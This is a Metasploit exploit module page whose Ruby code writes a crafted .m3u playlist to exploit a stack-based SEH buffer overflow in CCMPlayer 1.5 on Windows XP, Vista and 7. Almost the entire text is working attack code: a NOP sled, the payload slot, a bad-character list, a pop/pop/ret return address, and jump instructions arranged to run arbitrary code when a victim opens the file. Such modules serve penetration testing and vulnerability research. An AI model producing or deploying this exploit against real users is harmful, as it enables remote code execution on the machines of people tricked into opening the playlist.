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CCMPlayer 1.5 Stack based Buffer Overflow (.m3u)

🗓️ 03 Dec 2011 00:00:00Reported by metasploitType 
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CCMPlayer 1.5 Buffer Overflow Exploi

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##
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# Framework web site for more information on licensing and terms of use.
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##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking
 
    include Msf::Exploit::FILEFORMAT
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'CCMPlayer 1.5 Stack based Buffer Overflow (.m3u)',
            'Description'    => %q{
                    This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening
                a m3u playlist with a long track name, a SEH exception record can be overwritten
                with parts of the controllable buffer. SEH execution is triggered after an
                invalid read of an injectible address, thus allowing arbitrary code execution.
                This module works on multiple Windows platforms including: Windows XP SP3,
                Windows Vista, and Windows 7.
            },
            'License'        => MSF_LICENSE,
            'Author'         => ['Rh0'], # discovery and metasploit module
            'References'     =>
                [
                    ['URL', 'http://www.exploit-db.com/exploits/18178/']
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                    'DisablePayloadHandler' => 'true',
                },
            'Payload'        =>
                {
                    'Space' => 0x1000,
                    'BadChars' => "\x00\x0d\x0a\x1a\x2c\x2e\x3a\x5c", # \x00\r\n\x1a,.:\\
                    'DisableNops' => 'True',
                    'StackAdjustment' => -3500,
                },
            'Platform'      => 'win',
            'Targets'       =>
                [
                    [
                        'CCMPlayer 1.5',
                        {
                            # pop esi / pop ebx / ret (in ccmplay.exe)
                            # tweak it if necessary
                            'Ret' => 0x00403ca7, # last NULL in buffer is accepted
                            'Offset' => 0x1000
                        }
                    ]
                ],
            'Privileged'     => false,
            'DisclosureDate' => '30 Nov 2011', # to my knowledge
            'DefaultTarget'  => 0))
 
            register_options(
                [
                    OptString.new('FILENAME', [ true, 'The file name.',  'msf.m3u']),
                ], self.class)
    end
 
    def exploit
 
        m3u = "C:\\"
        # shellcode
        m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "nop").encode_string * 25
        m3u << payload.encoded
        # junk
        m3u << rand_text_alpha_upper(target['Offset'] - (25 + payload.encoded.length))
        # need an access violation when reading next 4 bytes as address (0xFFFFFFFF)
        # to trigger SEH
        m3u << [0xffffffff].pack("V")
        # pad
        m3u << rand_text_alpha_upper(3)
        # long jmp: jmp far back to shellcode
        m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-4103").encode_string
        # NSEH: jmp short back to long jmp instruction
        m3u << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5").encode_string
        # pad (need more 2 bytes to fill up to 4, as jmp $-5 are only 2 bytes)
        m3u << rand_text_alpha_upper(2)
        # SEH Exception Handler Address -> p/p/r
        m3u << [target.ret].pack("V")
        m3u << ".mp3\r\n" # no crash without it
 
        print_status("Creating '#{datastore['FILENAME']}' file ...")
 
        # Open CCMPlayer -> Songs -> Add -> Files of type: m3u -> msf.m3u => exploit
        file_create(m3u)
 
    end
 
end



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